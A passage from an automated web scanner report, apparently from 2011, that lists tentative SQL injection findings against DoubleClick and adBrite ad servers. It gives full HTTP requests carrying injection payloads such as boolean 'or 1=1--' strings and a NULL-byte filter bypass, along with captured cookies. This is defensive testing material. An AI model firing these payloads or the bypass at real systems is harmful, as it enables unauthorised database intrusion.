Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In this instance _eo is not a parameter of ad.doubleclick.net at all: it belongs to the bn.xp1.ru4.com click-tracker URL carried inside the click= value, which, as the DCFlash responses in 1.2 and 1.4 show, the ad server re-embeds into the creative's clickTag rather than requesting itself. Any database lookup on _eo would happen at ru4.com when a user follows the click-through, not in the responses compared here, so this finding needs to be re-tested against that host directly, with the usual check that its baseline response is stable.

Request 1

GET /adi/x1.rtb/casio/cttech;sz=728x90;click=http://bn.xp1.ru4.com/bclick?_f=TclHeQANXY0K2hnW4MUzgg==&_o=17694803&_eo=5278628613726'%20or%201%3d1--%20&_et=1305036666&_a=17764029&_s=44276902&_d=17767339&_pm=52786&_pn=17767350&redirect=;u=17767350;ord=1300754? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB7gqneUfJTY27Ndaz6AaC55SGDpyLwYICoN-GtBH454OTEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi01MjIwOTYwNDk1MTIyMzc1oAH04JnsA7IBDHd3dy5nZWVrLmNvbboBCTcyOHg5MF9hc8gBCdoBXmh0dHA6Ly93d3cuZ2Vlay5jb20vYXJ0aWNsZXMvZ2Vlay1waWNrLzYzMzk4LS0lM0UlM0NzY3JpcHQlM0VhbGVydCgxKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-YAoIGwAIEyAL264oOqAMB6APdBegDpgPoA5sE9QMCAADEgAaI9ZrRq8yS2vkB%26num%3D1%26sig%3DAGiWqtw7c8Tc5DaxrY1WfTDVIyVygQSXPQ%26client%3Dca-pub-5220960495122375%26adurl%3D&_wp=TclHeQANXY0K2hnW4MUzgkvhkmlLmS-_BY7o8A&_nv=1&_CDbg=17764029&_eo=52786&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAL0ODwEAAAAAqxsPAQAAAAC2Gw8BAAAAAL8bDwEAAAAAwBsPAQAAAAAy-txBAAAAAAAA-D8AAAAAAAAAADLOAAAAAAAAppyjAgAAAAAyzgAAAAAAABgAAAAAAAAAVGNsSGVRQU5YWTBLMmhuVzRNVXpnZz09GwAAAAAAAABDQUVTRUs2TmNPZ1gwaF9RUUpFNXFZZ2dtYTAAAAAAAAAAAA8AAAAAAAAAMTczLjE5My4yMTQuMjQzBgAAAAAAAAA3Mjh4OTAhAAAAAAAAADEwNjNiYmUwOTllYTY0OGMuYW5vbnltb3VzLmdvb2dsZQwAAAAAAAAAXl4xNzU2MTI5MjgyAwAAAAAAAAA3MzMGAAAAOwAAAAAAAAAAAAAAAAAAAAB6R8lNAAAAAA==
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 10 May 2011 14:18:24 GMT
Content-Length: 4592

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-- This code was autogenerated @ Tue Apr 26 17:21:31 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>

<SCRIPT LANGUAGE="JavaScript">

<!--
var clickThroughOverlayApplied = 'false';
var dcallowscriptaccess = 'never';
var plugin = false;
var advurl = 'http://di.casio.com/digital_cameras/TRYX/TRYX?utm_source= x1&utm_medium=display&utm_content=728x90-Casio-Diner&utm_campaign=tryx';
var alttext = '';
var dcgif = 'http://s0.2mdn.net/3178434/728x90-casio-diner.jpg';
var dccreativewidth = '728';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=TclHeQANXY0K2hnW4MUzgg==&_o=17694803&_eo=5278628613726'%20or%201%3d1--%20&_et=1305036666&_a=17764029&_s=44276902&_d=17767339&_pm=52786&_pn=17767350&redirect=http%3a%2f%2fdi.casio.com/digital_cameras/TRYX/TRYX%3Futm_source%3D+x1%26utm_medium%3Ddisplay%26utm_content%3D728x90-Casio-Diner%26utm_campaign%3Dtryx';
var target = '_blank';
var dcbgcolor = '';
var dcswf = 'http://s0.2mdn.net/3178434/728x90-casio-diner.swf';
var dcminversion = '8';
var dccreativeheight = '90';

var clickTag = encodeURIComponent('http://ad.doubleclick.net/click%3Bh%3Dv8/3b03/f/bd/%2a/c%3B240515919%3B2-0%3B0%3B63412091%3B3454-728/90%3B41891531/41909318/1%3Bu%3D17767350%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=TclHeQANXY0K2hnW4MUzgg==&_o=17694803&_eo=5278628613726'%20or%201%3d1--%20&_et=1305036666&_a=17764029&_s=44276902&_d=17767339&_pm=52786&_pn=17767350&redirect=http%3a%2f%2fdi.casio.com/digital_cameras/TRYX/TRYX%3Futm_source%3D+x1%26utm_medium%3Ddisplay%26utm_content%3D728x90-Casio-Diner%26utm_campaign%3Dtryx');
function checkFlash(v){
var y, x, s="Shockwave", f="Flash", o="object", u="undefined", np=navigator.plugins, nm=navigator.mimeTypes, nmd="application/x-shockwave-flash";
v = Math.max(Math.floor(v) || 0, 6); // check if v is a number and use Flash Player 6 as the minimum player version
if(typeof np!=u&&typeof np[s+" "+f]==o&&(x=np[s+" "+f].description)&&!(typeof nm!=u&&nm[nmd]&&!nm[nmd].enabledPlugin)){
if(v<=x.match(/Sho
...[SNIP]...

Request 2

GET /adi/x1.rtb/casio/cttech;sz=728x90;click=http://bn.xp1.ru4.com/bclick?_f=TclHeQANXY0K2hnW4MUzgg==&_o=17694803&_eo=5278628613726'%20or%201%3d2--%20&_et=1305036666&_a=17764029&_s=44276902&_d=17767339&_pm=52786&_pn=17767350&redirect=;u=17767350;ord=1300754? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB7gqneUfJTY27Ndaz6AaC55SGDpyLwYICoN-GtBH454OTEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi01MjIwOTYwNDk1MTIyMzc1oAH04JnsA7IBDHd3dy5nZWVrLmNvbboBCTcyOHg5MF9hc8gBCdoBXmh0dHA6Ly93d3cuZ2Vlay5jb20vYXJ0aWNsZXMvZ2Vlay1waWNrLzYzMzk4LS0lM0UlM0NzY3JpcHQlM0VhbGVydCgxKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-YAoIGwAIEyAL264oOqAMB6APdBegDpgPoA5sE9QMCAADEgAaI9ZrRq8yS2vkB%26num%3D1%26sig%3DAGiWqtw7c8Tc5DaxrY1WfTDVIyVygQSXPQ%26client%3Dca-pub-5220960495122375%26adurl%3D&_wp=TclHeQANXY0K2hnW4MUzgkvhkmlLmS-_BY7o8A&_nv=1&_CDbg=17764029&_eo=52786&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAL0ODwEAAAAAqxsPAQAAAAC2Gw8BAAAAAL8bDwEAAAAAwBsPAQAAAAAy-txBAAAAAAAA-D8AAAAAAAAAADLOAAAAAAAAppyjAgAAAAAyzgAAAAAAABgAAAAAAAAAVGNsSGVRQU5YWTBLMmhuVzRNVXpnZz09GwAAAAAAAABDQUVTRUs2TmNPZ1gwaF9RUUpFNXFZZ2dtYTAAAAAAAAAAAA8AAAAAAAAAMTczLjE5My4yMTQuMjQzBgAAAAAAAAA3Mjh4OTAhAAAAAAAAADEwNjNiYmUwOTllYTY0OGMuYW5vbnltb3VzLmdvb2dsZQwAAAAAAAAAXl4xNzU2MTI5MjgyAwAAAAAAAAA3MzMGAAAAOwAAAAAAAAAAAAAAAAAAAAB6R8lNAAAAAA==
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 10 May 2011 14:18:25 GMT
Content-Length: 4497

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-- This code was autogenerated @ Wed May 04 17:51:39 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>

<SCRIPT LANGUAGE="JavaScript">

<!--
var clickThroughOverlayApplied = 'false';
var dcallowscriptaccess = 'never';
var plugin = false;
var advurl = 'http://di.casio.com/tryx?utm_source=x+1&utm_medium=display&utm_content=728x90-casioflip-flash&utm_campaign=tryx';
var alttext = '';
var dcgif = 'http://s0.2mdn.net/3178434/Casio-728x90.gif';
var dccreativewidth = '728';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=TclHeQANXY0K2hnW4MUzgg==&_o=17694803&_eo=5278628613726'%20or%201%3d2--%20&_et=1305036666&_a=17764029&_s=44276902&_d=17767339&_pm=52786&_pn=17767350&redirect=http%3a%2f%2fdi.casio.com/tryx%3Futm_source%3Dx%2B1%26utm_medium%3Ddisplay%26utm_content%3D728x90-casioflip-flash%26utm_campaign%3Dtryx';
var target = '_blank';
var dcbgcolor = '';
var dcswf = 'http://s0.2mdn.net/3178434/Casio-728x90.swf';
var dcminversion = '9';
var dccreativeheight = '90';

var clickTag = encodeURIComponent('http://ad.doubleclick.net/click%3Bh%3Dv8/3b03/f/bd/%2a/s%3B240515919%3B0-0%3B0%3B63412091%3B3454-728/90%3B42028567/42046354/1%3Bu%3D17767350%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=TclHeQANXY0K2hnW4MUzgg==&_o=17694803&_eo=5278628613726'%20or%201%3d2--%20&_et=1305036666&_a=17764029&_s=44276902&_d=17767339&_pm=52786&_pn=17767350&redirect=http%3a%2f%2fdi.casio.com/tryx%3Futm_source%3Dx%2B1%26utm_medium%3Ddisplay%26utm_content%3D728x90-casioflip-flash%26utm_campaign%3Dtryx');
function checkFlash(v){
var y, x, s="Shockwave", f="Flash", o="object", u="undefined", np=navigator.plugins, nm=navigator.mimeTypes, nmd="application/x-shockwave-flash";
v = Math.max(Math.floor(v) || 0, 6); // check if v is a number and use Flash Player 6 as the minimum player version
if(typeof np!=u&&typeof np[s+" "+f]==o&&(x=np[s+" "+f].description)&&!(typeof nm!=u&&nm[nmd]&&!nm[nmd].enabledPlugin)){
if(v<=x.match(/Shockwave Flash (\d+)/)[1])return true;}
else if(typeof windo
...[SNIP]...

1.6. http://ad.doubleclick.net/adi/x1.rtb/casio/cttech [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/casio/cttech

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/x1.rtb/casio/cttech;sz=728x90;click=http://bn.xp1.ru4.com/bclick?_f=TclHeQANXY0K2hnW4MUzgg==&_o=17694803&_eo=52786&_et=1305036666&_a=17764029&_s=44276902&_d=17767339&_pm=52786&_pn=17767350&redirect=;u=17767350;ord=1300754?&1'%20and%201%3d1--%20=1 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB7gqneUfJTY27Ndaz6AaC55SGDpyLwYICoN-GtBH454OTEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi01MjIwOTYwNDk1MTIyMzc1oAH04JnsA7IBDHd3dy5nZWVrLmNvbboBCTcyOHg5MF9hc8gBCdoBXmh0dHA6Ly93d3cuZ2Vlay5jb20vYXJ0aWNsZXMvZ2Vlay1waWNrLzYzMzk4LS0lM0UlM0NzY3JpcHQlM0VhbGVydCgxKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-YAoIGwAIEyAL264oOqAMB6APdBegDpgPoA5sE9QMCAADEgAaI9ZrRq8yS2vkB%26num%3D1%26sig%3DAGiWqtw7c8Tc5DaxrY1WfTDVIyVygQSXPQ%26client%3Dca-pub-5220960495122375%26adurl%3D&_wp=TclHeQANXY0K2hnW4MUzgkvhkmlLmS-_BY7o8A&_nv=1&_CDbg=17764029&_eo=52786&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAL0ODwEAAAAAqxsPAQAAAAC2Gw8BAAAAAL8bDwEAAAAAwBsPAQAAAAAy-txBAAAAAAAA-D8AAAAAAAAAADLOAAAAAAAAppyjAgAAAAAyzgAAAAAAABgAAAAAAAAAVGNsSGVRQU5YWTBLMmhuVzRNVXpnZz09GwAAAAAAAABDQUVTRUs2TmNPZ1gwaF9RUUpFNXFZZ2dtYTAAAAAAAAAAAA8AAAAAAAAAMTczLjE5My4yMTQuMjQzBgAAAAAAAAA3Mjh4OTAhAAAAAAAAADEwNjNiYmUwOTllYTY0OGMuYW5vbnltb3VzLmdvb2dsZQwAAAAAAAAAXl4xNzU2MTI5MjgyAwAAAAAAAAA3MzMGAAAAOwAAAAAAAAAAAAAAAAAAAAB6R8lNAAAAAA==
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 10 May 2011 14:24:20 GMT
Content-Length: 4501

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-- This code was autogenerated @ Tue Apr 26 17:20:08 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>

<SCRIPT LANGUAGE="JavaScript">

<!--
var clickThroughOverlayApplied = 'false';
var dcallowscriptaccess = 'never';
var plugin = false;
var advurl = 'http://di.casio.com/digital_cameras/TRYX/TRYX?utm_source= x1&utm_medium=display&utm_content=728x90-Casio-Dartboard&utm_campaign=tryx';
var alttext = '';
var dcgif = 'http://s0.2mdn.net/3178434/728x90-casio-dart.jpg';
var dccreativewidth = '728';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=TclHeQANXY0K2hnW4MUzgg==&_o=17694803&_eo=52786&_et=1305036666&_a=17764029&_s=44276902&_d=17767339&_pm=52786&_pn=17767350&redirect=http%3a%2f%2fdi.casio.com/digital_cameras/TRYX/TRYX%3Futm_source%3D+x1%26utm_medium%3Ddisplay%26utm_content%3D728x90-Casio-Dartboard%26utm_campaign%3Dtryx';
var target = '_blank';
var dcbgcolor = '';
var dcswf = 'http://s0.2mdn.net/3178434/728x90-casio-dart.swf';
var dcminversion = '8';
var dccreativeheight = '90';

var clickTag = encodeURIComponent('http://ad.doubleclick.net/click%3Bh%3Dv8/3b03/f/a2/%2a/r%3B240515919%3B1-0%3B0%3B63412091%3B3454-728/90%3B41891502/41909289/1%3Bu%3D17767350%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=TclHeQANXY0K2hnW4MUzgg==&_o=17694803&_eo=52786&_et=1305036666&_a=17764029&_s=44276902&_d=17767339&_pm=52786&_pn=17767350&redirect=http%3a%2f%2fdi.casio.com/digital_cameras/TRYX/TRYX%3Futm_source%3D+x1%26utm_medium%3Ddisplay%26utm_content%3D728x90-Casio-Dartboard%26utm_campaign%3Dtryx');
function checkFlash(v){
var y, x, s="Shockwave", f="Flash", o="object", u="undefined", np=navigator.plugins, nm=navigator.mimeTypes, nmd="application/x-shockwave-flash";
v = Math.max(Math.floor(v) || 0, 6); // check if v is a number and use Flash Player 6 as the minimum player version
if(typeof np!=u&&typeof np[s+" "+f]==o&&(x=np[s+" "+f].description)&&!(typeof nm!=u&&nm[nmd]&&!nm[nmd].enabledPlugin)){
if(v<=x.match(/Shockwave Flash (\d+)/)[1])return true;}
else
...[SNIP]...

Request 2

GET /adi/x1.rtb/casio/cttech;sz=728x90;click=http://bn.xp1.ru4.com/bclick?_f=TclHeQANXY0K2hnW4MUzgg==&_o=17694803&_eo=52786&_et=1305036666&_a=17764029&_s=44276902&_d=17767339&_pm=52786&_pn=17767350&redirect=;u=17767350;ord=1300754?&1'%20and%201%3d2--%20=1 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB7gqneUfJTY27Ndaz6AaC55SGDpyLwYICoN-GtBH454OTEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi01MjIwOTYwNDk1MTIyMzc1oAH04JnsA7IBDHd3dy5nZWVrLmNvbboBCTcyOHg5MF9hc8gBCdoBXmh0dHA6Ly93d3cuZ2Vlay5jb20vYXJ0aWNsZXMvZ2Vlay1waWNrLzYzMzk4LS0lM0UlM0NzY3JpcHQlM0VhbGVydCgxKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-YAoIGwAIEyAL264oOqAMB6APdBegDpgPoA5sE9QMCAADEgAaI9ZrRq8yS2vkB%26num%3D1%26sig%3DAGiWqtw7c8Tc5DaxrY1WfTDVIyVygQSXPQ%26client%3Dca-pub-5220960495122375%26adurl%3D&_wp=TclHeQANXY0K2hnW4MUzgkvhkmlLmS-_BY7o8A&_nv=1&_CDbg=17764029&_eo=52786&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAL0ODwEAAAAAqxsPAQAAAAC2Gw8BAAAAAL8bDwEAAAAAwBsPAQAAAAAy-txBAAAAAAAA-D8AAAAAAAAAADLOAAAAAAAAppyjAgAAAAAyzgAAAAAAABgAAAAAAAAAVGNsSGVRQU5YWTBLMmhuVzRNVXpnZz09GwAAAAAAAABDQUVTRUs2TmNPZ1gwaF9RUUpFNXFZZ2dtYTAAAAAAAAAAAA8AAAAAAAAAMTczLjE5My4yMTQuMjQzBgAAAAAAAAA3Mjh4OTAhAAAAAAAAADEwNjNiYmUwOTllYTY0OGMuYW5vbnltb3VzLmdvb2dsZQwAAAAAAAAAXl4xNzU2MTI5MjgyAwAAAAAAAAA3MzMGAAAAOwAAAAAAAAAAAAAAAAAAAAB6R8lNAAAAAA==
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 10 May 2011 14:24:21 GMT
Content-Length: 4389

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-- This code was autogenerated @ Wed May 04 17:51:39 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>

<SCRIPT LANGUAGE="JavaScript">

<!--
var clickThroughOverlayApplied = 'false';
var dcallowscriptaccess = 'never';
var plugin = false;
var advurl = 'http://di.casio.com/tryx?utm_source=x+1&utm_medium=display&utm_content=728x90-casioflip-flash&utm_campaign=tryx';
var alttext = '';
var dcgif = 'http://s0.2mdn.net/3178434/Casio-728x90.gif';
var dccreativewidth = '728';
var dcwmode = 'opaque';
var imgurl = 'http://bn.xp1.ru4.com/bclick?_f=TclHeQANXY0K2hnW4MUzgg==&_o=17694803&_eo=52786&_et=1305036666&_a=17764029&_s=44276902&_d=17767339&_pm=52786&_pn=17767350&redirect=http%3a%2f%2fdi.casio.com/tryx%3Futm_source%3Dx%2B1%26utm_medium%3Ddisplay%26utm_content%3D728x90-casioflip-flash%26utm_campaign%3Dtryx';
var target = '_blank';
var dcbgcolor = '';
var dcswf = 'http://s0.2mdn.net/3178434/Casio-728x90.swf';
var dcminversion = '9';
var dccreativeheight = '90';

var clickTag = encodeURIComponent('http://ad.doubleclick.net/click%3Bh%3Dv8/3b03/f/a2/%2a/s%3B240515919%3B0-0%3B0%3B63412091%3B3454-728/90%3B42028567/42046354/1%3Bu%3D17767350%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=TclHeQANXY0K2hnW4MUzgg==&_o=17694803&_eo=52786&_et=1305036666&_a=17764029&_s=44276902&_d=17767339&_pm=52786&_pn=17767350&redirect=http%3a%2f%2fdi.casio.com/tryx%3Futm_source%3Dx%2B1%26utm_medium%3Ddisplay%26utm_content%3D728x90-casioflip-flash%26utm_campaign%3Dtryx');
function checkFlash(v){
var y, x, s="Shockwave", f="Flash", o="object", u="undefined", np=navigator.plugins, nm=navigator.mimeTypes, nmd="application/x-shockwave-flash";
v = Math.max(Math.floor(v) || 0, 6); // check if v is a number and use Flash Player 6 as the minimum player version
if(typeof np!=u&&typeof np[s+" "+f]==o&&(x=np[s+" "+f].description)&&!(typeof nm!=u&&nm[nmd]&&!nm[nmd].enabledPlugin)){
if(v<=x.match(/Shockwave Flash (\d+)/)[1])return true;}
else if(typeof window.ActiveXObject!=u){
for(y=16;y>=v;y--){
try{x=new A
...[SNIP]...

1.7. http://ads2.adbrite.com/v0/ad [zs parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The zs parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the zs parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /v0/ad?sid=1548716&zs=3330305f323530%00'&ifr=1&ref=http%3A%2F%2Fletters.salon.com%2Fpolitics%2Fwar_room%2F2011%2F05%2F09%2Fsantorum_loser%2Fview%2F&zx=65&zy=5550&ww=1066&wh=967&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://letters.salon.com/politics/war_room/2011/05/09/santorum_loser/view/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:682865:20838240:null:0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0; b="%3A%3Axews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; srh="1%3Aq64FAA%3D%3D"; rb2=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; ut="1%3AXZFbkoMgFET3wrcfPKJY2Y1EI0Qe8kgsDdl7gBmndH4Pp%2Bt2F2%2FwwuD6BtOwLsb1HlyBW6R6RmSVpzSiCKsMfAYz7Qu4cd6OFnavBOUYVMSRVV4ITbLFYIlF9JhgdnU94TqMP09DcnFfWUu2JZGWOJkIqnfvbk7eTtWJejlImQgLi4k0Noz8ifpfXDZibS6Z9vApj%2B35nOD24KdJ3Byhn0jIlrIalUkXZdIkp4wuNW3f%2FobLcVGfW2LvUmxe71rHLiIUtv3MgLPJ4XiIN%2FR2jIMKsE7rwYnyKeDz%2BQI%3D"; vsd=0@1@4dc81431@load.exelator.com

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Tue, 10 May 2011 13:19:37 GMT
Content-Length: 0

Request 2

GET /v0/ad?sid=1548716&zs=3330305f323530%00''&ifr=1&ref=http%3A%2F%2Fletters.salon.com%2Fpolitics%2Fwar_room%2F2011%2F05%2F09%2Fsantorum_loser%2Fview%2F&zx=65&zy=5550&ww=1066&wh=967&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://letters.salon.com/politics/war_room/2011/05/09/santorum_loser/view/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:682865:20838240:null:0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0; b="%3A%3Axews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; srh="1%3Aq64FAA%3D%3D"; 